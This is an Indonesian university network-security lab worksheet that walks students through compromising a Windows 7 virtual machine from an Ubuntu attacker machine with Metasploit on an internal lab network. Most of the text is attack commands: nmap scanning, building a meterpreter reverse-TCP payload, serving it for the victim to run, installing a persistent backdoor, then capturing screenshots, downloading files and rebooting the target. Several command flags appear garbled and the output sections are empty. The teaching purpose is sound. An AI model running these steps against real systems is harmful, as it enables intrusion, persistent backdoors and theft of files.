jurnal metasploit(revisi)
TRANSCRIPT
Modul PraktekNetwork Security Keamanan JaringanTelkom University 2014-2015JURNAL PRAKTIKUMSkema PraktikumKomputer PenyerangKomputer Target
Sistem Operasi Ubuntu 12.04IP Address 192.168.1.2 Sistem Operasi Windows 7IP Address 192.168.1.4
LANGKAH 1Persiapkan komputer target1. Ubah pengaturan jaringan Virtual box pada sistem operasi komputer target Setting > jaringan > Adapter 1Centang : Nyalakan Adapter JaringanAttached to : Jaringan Internal
Klik mulai untuk menghidupkan mesin virtual komputer target
2. Non aktifkan firewall pada komputer targetStart > Control Panel > System and Security > Windows Firewall > Costumize Setting >
3. Aktifkan remote Desktop pada komputer targetStart > Control Panel > System and Security > System > Remote settings
4. Setting IP address pada komputer targetStart > Control Panel > Network and Internet > Network and Sharing Center > Local Area Connections > Properties >Internet Protocol Version 4 (TCP/IPv4)>Use the following IP address:IP address: 192.168.1.4Subnet mask: 255.255.255.0Default gateway: 192.168.1.1
LANGKAH 2Persiapkan komputer penyerang1. Ubah pengaturan jaringan Virtual box pada sistem operasi komputer target Setting > jaringan > Adapter 1Centang : Nyalakan Adapter JaringanAttached to : Jaringan Internal
2. Klik mulai untuk menghidupkan mesin virtual komputer penyerang
3. Masuk sebagai rootpraktikum@praktikum:~$ sudo su
4. Setting IP static pada komputer penyerang melalui root@praktikum:~# nano /etc/network/interfaces
Ubah isi file menjadi berikut :auto lo iface lo inet loopback
auto eth0iface eth0 inet loopbackaddress 192.168.1.3netmask 255.255.255.0network 192.168.1.0gateway 192.168.1.1broadcast 192.168.1.255
Tekan ctrl + x lalu ketik y untuk menyimpan dan keluar dari editor 5. Restart networking untuk mendapatkan IP address yang telah dikonfigurasiroot@praktikum:~# /etc/init.d/networking restart
LANGKAH 3Melakukan scanning dengan nmap1. Lakukan foot printing untuk mendapatkan informasi sistem targetroot@praktikum:~# nmap sS O 192.168.1.1/24 192.168.1.255/24
Output dari perintah diatas :
LANGKAH 4Uji koneksi dari komputer penyerang ke komputer target :root@praktikum:~$ ping 192.168.1.4
Output dari perintah diatas :
LANGKAH 5Pastikan apache2 dalam keadaan aktifroot@praktikum:~#/etc/init.d/apache2 restart
LANGKAH 6Melakukan exploitasi dan instalasi backdoor dari komputer penyerang ke komputer target dengan metasploit1. Membuat payload di komputer penyerang untuk komputer target root@praktikum:~#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=666 x > /var/www/praktikum.exe msfconsole
Output dari perintah diatas: 2. Ketik msfconsole untuk memulai metasploit msroot@praktikum:~# msfconsole
3. Pilih payload yang sesuai dengan tujuan komputer targetmsf > use exploit/multi/handler
4. setting payload yang tepat dari sesuai dengan tujuan exploitasimsf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
5. Masukan IP komputer penyerang kedalam konfigurasi
Masukan port sesuai yang direncanakan pada pembuatan backdoormsf exploit(handler) > set LHOST 192.168.1.2
msf exploit(handler) > set LPORT 666
6. Lakukan exploitasi msf exploit(handler) > exploit
7. Menyimpan backdoor pada komputer target dengan membuka browser pada komputer target, masukan URL: http://192.168.1.2/praktikum.exe Klik run
Klik run
8. Sampai tahap ini, exploitasi sudah berhasil, kemudian kembali ke komputer penyerang untuk tahap instalasi backdoor, baca informasi sistem komputer targetmeterpreter > sysinfo
Output dari perintah diatas:
9. Periksa IP Address pada komputer targetmeterpreter > ifconfig
Output dari perintah diatas:
10. Instalasi backdoor pada komputer penyerang terhadap komputer targetmeterpreter >run persistence U -i 5 p 1037 r 192.168.1.2
Catatan : 1037 adalah port yang terbuka tetapi belum digunakanOutput dari perintah diatas:
Baris terakhir menunjukan tempat penyimpanan backdoor dari komputer penyerang 11. Keluar dari aktifitas exploitasimeterpreter > exit
12. Lakukan eksploitasi kembali dengan menggunakan backdoor yang telah diinstal sebelumnya, dengan mengganti port pada komputer penyerang sesuai port yang disetting sebelumnya yaitu port 1037.msf exploit(handler) > set LPORT 1037
13. Lakukan exploitasi msf exploit(handler) > exploit
secara otomatis akan masuk ke payload meterpreter tanpa konfirmasi dari komputer target14. Melihat perintah yang tersedia pada meterpretermeterpreter > help
15. Lakukan screenshoot komputer targetmeterpreter > screenshot
buka hasil screenshoot diatas, berikut lokasi penyimpanan
16. Melihat posisi direktori saat inimeterpreter > pwd
Outputnya
Jika ingin pindah ke direktori yang lain, contoh :meterpreter > cd D:/
17. Download file pada komputer target meterpreter > download namafile
contoh :
Maka file akan tersimpan pada direktori dimana msfconsole dimulai 18. Lakukan restart mesin targetmeterpreter > reboot
1